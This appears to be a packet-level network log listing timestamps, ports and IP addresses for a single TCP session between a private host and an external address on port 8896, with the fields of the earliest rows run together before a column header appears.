                              May 23, 2024 21:15:06.105909109 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:06.841717005 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:06.846793890 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:07.042987108 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:07.106161118 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:07.918732882 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:07.960961103 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:08.181947947 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:08.293420076 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:08.539463997 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:08.550754070 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:08.724903107 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:08.801568031 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:08.817154884 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:08.856146097 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:08.872848988 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:08.878031015 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:09.050550938 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:09.105890036 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:09.167398930 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:09.219202995 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:09.589417934 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:09.595762968 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:09.775731087 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:09.825367928 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:09.830708027 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:10.030940056 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:10.157337904 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:10.168818951 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:10.202219009 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:10.202285051 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:10.207288980 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:10.256921053 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:10.268049002 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:10.388195038 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:10.480907917 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:10.481138945 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:10.587548971 CEST88964970512.202.180.134192.168.2.8
Timestamp                             SrcPort  DstPort  Source IP       Dest IP
May 23, 2024 21:15:10.651823044 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:10.658916950 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:10.851356983 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:10.902818918 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:11.456386089 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:11.468138933 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:11.689825058 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:11.793431997 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:16.300663948 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:16.305720091 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:16.488154888 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:16.605957031 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:17.368372917 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:17.373373985 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:17.547535896 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:17.699909925 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:17.945470095 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:17.950541019 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:18.144535065 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:18.219786882 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:19.437974930 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:19.443262100 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:19.564466953 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:19.569379091 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:19.579313040 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:19.627588987 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:19.627619982 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:19.699743032 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:19.746830940 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:19.844342947 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:19.844448090 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:21.083451986 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:21.133146048 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:21.156356096 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:21.161565065 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:21.262074947 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:21.347856998 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:21.360939026 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:21.368038893 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:21.377983093 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:21.431022882 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:21.431062937 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:21.436753035 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:21.530747890 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:21.535862923 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:21.544244051 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:21.549344063 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:21.601224899 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:21.651945114 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:21.699863911 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:21.802685976 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:21.807912111 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:21.858541965 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:21.891089916 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:21.891275883 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:21.923521996 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:21.974530935 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:22.025743961 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:22.081438065 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:22.103880882 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:22.121877909 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:22.207894087 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:22.235887051 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:22.367898941 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:22.371926069 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:23.246809959 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:23.255335093 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:23.486788988 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:23.784400940 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:24.380167961 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:24.380191088 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:24.380193949 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:24.380281925 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:24.380448103 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:24.435297966 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:24.435349941 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:24.560549021 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:24.605998039 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:24.652734041 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:24.789952040 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:24.791924000 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:25.244826078 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:25.262588978 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:25.405112028 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:25.452044010 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:25.468983889 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:25.472806931 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:25.499739885 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:25.540832043 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:25.552465916 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:25.606307983 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:25.607487917 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:25.634758949 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:25.692507029 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:25.697421074 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:25.710706949 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:25.790087938 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:25.790168047 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:25.846030951 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:25.938708067 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:25.938776016 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:26.670875072 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:26.717216969 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:26.851885080 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:26.902900934 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:27.310695887 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:27.317194939 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:27.579813004 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:27.750627041 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:28.698267937 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:28.703166008 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:28.824594021 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:28.829655886 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:28.885731936 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:29.040265083 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:29.042743921 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:29.338998079 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:29.343980074 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:29.535933018 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:29.606014967 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:29.738291025 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:29.743920088 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:29.771619081 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:29.779908895 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:29.963917017 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:30.019890070 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:30.023907900 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:30.155951977 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:30.240798950 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:30.247911930 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:30.431941032 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:30.606172085 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:31.351685047 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:31.356689930 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:31.530021906 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:31.665759087 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:31.778115988 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:31.783413887 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:31.959918022 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:32.106046915 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:34.294399023 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:34.302577019 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:34.322845936 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:34.327797890 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:34.372772932 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:34.379482985 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:34.472232103 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:34.478854895 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:34.488199949 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:34.493084908 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:34.540179968 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:34.569086075 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:34.585850954 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:34.652545929 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:34.674468040 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:34.761457920 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:34.763866901 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:34.823790073 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:34.849447012 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:34.856808901 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:34.922013998 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:34.922070980 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:35.031387091 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:35.031395912 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:35.100630999 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:35.161817074 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:35.254519939 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:35.259947062 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:35.326078892 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:35.332721949 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:35.380917072 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:35.499942064 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:35.529902935 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:35.607934952 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:35.970532894 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:36.107968092 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:36.219258070 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:36.300563097 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:36.426645041 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:36.432178974 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:36.479288101 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:36.618560076 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:36.618657112 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:36.740192890 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:36.795145988 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:36.795250893 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:36.800169945 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:36.805656910 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:36.810587883 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:36.878122091 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:36.887921095 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:36.910466909 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:36.935290098 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:36.983319998 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:36.983370066 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:36.992429972 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:37.039419889 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:37.041254044 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:37.089299917 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:37.139126062 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:37.274046898 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:37.276010990 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:37.367022991 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:37.460742950 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:37.464051008 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:37.621417999 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:37.627716064 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:37.803520918 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:37.902956963 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:38.433713913 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:38.439901114 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:38.482606888 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:38.487642050 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:38.534051895 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:38.539017916 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:38.592668056 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:38.648454905 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:38.648464918 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:38.648524046 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:38.697585106 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:38.697675943 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:38.708662033 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:38.759322882 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:38.776462078 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:38.825330973 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:38.872526884 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:38.956336975 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:38.956408978 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:39.043354988 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:39.048629045 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:39.095354080 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:39.149017096 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:39.155970097 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:39.286250114 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:39.403178930 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:40.293627024 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:40.345529079 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:40.378814936 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:40.390260935 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:40.491203070 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:40.549834967 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:40.608268023 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:40.613413095 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:40.622329950 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:40.627288103 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:40.675620079 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:40.769876957 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:40.777506113 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:40.792609930 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:40.903047085 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:40.927310944 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:40.941447973 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:40.989485979 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:40.989640951 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:40.994685888 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:41.049278021 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:41.154283047 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:41.163086891 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:41.246901989 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:41.310020924 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:41.363307953 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:41.496758938 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:42.705231905 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:42.757503986 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:42.809750080 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:42.859585047 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:42.882327080 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:42.887392044 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:42.939449072 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:42.941834927 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:42.993362904 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:42.993433952 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:42.998467922 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:43.043311119 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:43.075525045 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:43.091283083 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:43.117213011 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:43.195569992 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:43.195605040 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:43.295990944 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:43.319171906 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:43.404057980 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:43.411639929 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:43.504184961 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:43.508111000 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:43.842813015 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:43.848056078 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:44.026101112 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:44.061022997 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:44.085341930 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:44.257227898 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:44.309279919 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:44.355894089 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:44.362327099 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:44.487405062 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:44.493136883 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:44.497595072 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:44.502535105 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:44.533133030 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:44.541245937 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:44.591442108 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:44.643768072 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:44.671802998 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:44.739212990 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:44.766168118 CEST  8896     49705    12.202.180.134  192.168.2.8
